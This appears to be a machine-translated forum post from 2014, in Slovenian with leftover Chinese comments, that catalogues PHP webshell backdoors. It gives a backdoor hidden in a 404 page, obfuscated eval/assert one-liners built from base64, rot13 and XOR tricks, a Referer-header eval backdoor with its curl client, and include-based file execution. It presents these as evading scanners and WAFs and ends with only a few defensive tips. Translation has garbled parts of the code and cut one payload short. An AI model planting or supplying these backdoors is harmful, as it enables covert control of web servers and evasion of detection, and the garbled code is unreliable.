Te PHP backdoor programe obravnavamo z učno mentaliteto, veliko PHP backdoor kode pa nam omogoča, da vidimo, kako dobronamerni so programerji.
Močna PHP zadnja vrata v enem stavku
Takšna zadnja vrata omogočajo spletne strani,Skrbniki strežnikov so zelo zahtevni in pogosto morajo spreminjati metode za izvajanje različnih zaznav, številne nove tehnike pisanja pa ni mogoče odkriti in obvladati z običajnimi metodami zaznavanja.
Danes bomo našteli nekaj zanimivih PHP trojancev.
1. Skrij PHP ponije z uporabo 404 strani:
[mw_shl_code=php, res] <!DOCTYPE HTML JAVNO "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Ni najdeno</title>
</head><body>
<h1>Ni najdeno</h1>
<p>Zahtevanega URL-ja na tem strežniku ni bilo.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
glavo ('HTTP/1.1 404 Not Found');
?>[/mw_shl_code]
Stran 404 je pogosto uporabljena datoteka na spletni strani in malo ljudi jo bo preverjalo in spreminjalo, potem ko je splošno priporočena, zato jo lahko uporabimo za skrivanje zadnjih vrat.
2. Brezobličen skriti PHP v eni povedi:
[mw_shl_code=php,true]<?php
session_start();
$_POST['code'] & $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&preg_replace ('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a');
?>[/mw_shl_code]
Dodelite $_POST['code'] $_SESSION['theCode'], nato pa izvedite $_SESSION['theCode'], pri čemer je poudarek, da ni podpisne kode.
Če uporabite orodje za skeniranje za preverjanje kode, ne bo alarmiralo in doseglo cilj.
3. Super prikrita PHP zadnja vrata:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
Funkcija GET sama predstavlja trojanca;
Kako uporabljati:
[mw_shl_code=php, res]
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Po izvedbi trenutni imenik generira stavčni trojan, c.php ko je parameter A evalviran, je generacija trojanske napake spodletela, in ko se potrdi, bo prav tako poročala o napaki, vendar bo generirala trojanskega konja, ki ga ni mogoče podcenjevati.
Zahteva za nivo, koda za zagon PHP backdoor:
Ta metoda je izvedena z dvema datotekama, datoteka 1
[mw_shl_code=php,true]<?php
//1.php
glava('Content-type:text/html; Charset=utf-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10'& count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Dokument 2
[mw_shl_code=php,true]<?php
//2.php
glava('Content-type:text/html; Charset=utf-8′);
//要执行的代码
$code= <<<KODA
phpinfo();
CODE;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= array(
CURLOPT_URL => $url,
CURLOPT_HEADER => NAPAČNO,
CURLOPT_RETURNTRANSFER => RES,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
Zaženite kodo kodirano v base64 skozi HTTP_REFERER v HTTP zahtevi, da dosežete učinek zadnjih vrat.
Dobro je uporabiti to idejo za obhod WAF.
4.PHP orodje za generatorje zadnjih vrat
weevely je specifičen za PHPWebshell brezplačna programska oprema se lahko uporablja za simulacijo povezovalne lupine, podobne telnetu, Weevely se običajno uporablja za izkoriščanje spletnih programov, skrivanje stranskih vrat ali uporabo metod, podobnih telnetu namesto upravljanja spletnih strani, strežniška PHP koda, ki jo generira Weevely, je kodirana v base64, zato lahko zavaja glavno protivirusno programsko opremo in IDS, Ko naložiš strežniško kodo, jo običajno lahko zaženeš neposredno preko Weevelyja.
Funkcije, ki se uporabljajo v zadnjih vratih, so pogosto uporabljene funkcije za obdelavo nizov, funkcije, kot sta eval in sistem, ki se uporabljajo kot inšpekcijska pravila, pa se ne pojavijo neposredno v kodi, zato lahko datoteka zadnjih vrat zaobide preverjanje orodja za iskanje zadnjih vrat. Skeniranje z orodjem za zaznavanje spletnih vrat temne skupine pokaže, da datoteka ni ogrožena.
Zgornje je splošni uvod, relevantne metode uporabe pa tukaj niso predstavljene, gre za preprosto popularizacijo znanosti.
4. Trije deformirani enostavčni PHP trojanci
Prva:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
Druga
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ �”). ($_[+“”]|“”). ($_[+“”]^“�”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Vpiši http://site/2.php?_=assert&__=eval($_POST['pass']) geslo v kuhinjski nož je pass.
Če uporabite dodatne podatke kuhinjskega noža, so ti bolj skriti ali pa lahko uporabite druga orodja za vbrizgavanje, ker so podatki naknadno oddani.
Tretja
[mw_shl_code=php, res] ($b 4dboy= $_POST['b4dboy']) & @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'dodaj'); [/mw_shl_code]
str_rot13 ('riny') je kodirana ocena, ki popolnoma izogiba ključnim besedam, ne da bi izgubila učinek, zaradi česar ljudje bruhajo kri!
5. Nazadnje naštejte nekaj naprednih PHP trojanskih zadnjih vrat:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h'],"Dostop"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
include($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Dostop"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Za povzetek, ta PHP zadnja vrata lahko opišemo kot popolna, če niste previdni, vas bodo zagotovo prevarali, in kaj je glavna prioriteta našega članka danes? Ključne točke so v spodnjem povzetku!
Kako se spopasti s PHP enostavčnimi zadnjimi vrati:
Poudarjamo nekaj ključnih točk, in če berete ta članek, verjamem, da niste laik, zato ne bom dolgočasen:
- Pri pisanju PHP programov bodite pozorni na varnost
- Datoteke strežniškega dnevnika je treba pogosto brati in varnostno kopirati
- Stroga dodelitev dovoljenj za vsako lokacijo
- Pogosti serijski varnostni pregledi dinamičnih datotek in imenikov
- Naučite se, kako izvajati ročno protivirusno "Vedenjsko presojo in preiskavo"
- Ostanite z nami ali se infiltrirajte v aktivni tabor za kibernetsko varnost
- Tudi funkcija se lahko uporablja kot pravilo za hierarhično obdelavo strežniškega okolja
Verjamemo, da bi morali, ko je več strani za upravljanje in veliko podatkov, razumno uporabiti nekaj pomožnih orodij, vendar se ne smemo popolnoma zanašati na ta orodja, tehnologija se nenehno posodablja in izboljšuje, najpomembneje je, da se naučite in razumete razmišljanje o pisanju teh močnih 'backdoor' ljudi, in prenos vlog vam lahko prinese večji napredek.
|
Objavljeno na 1. 12. 2014 21:41:13
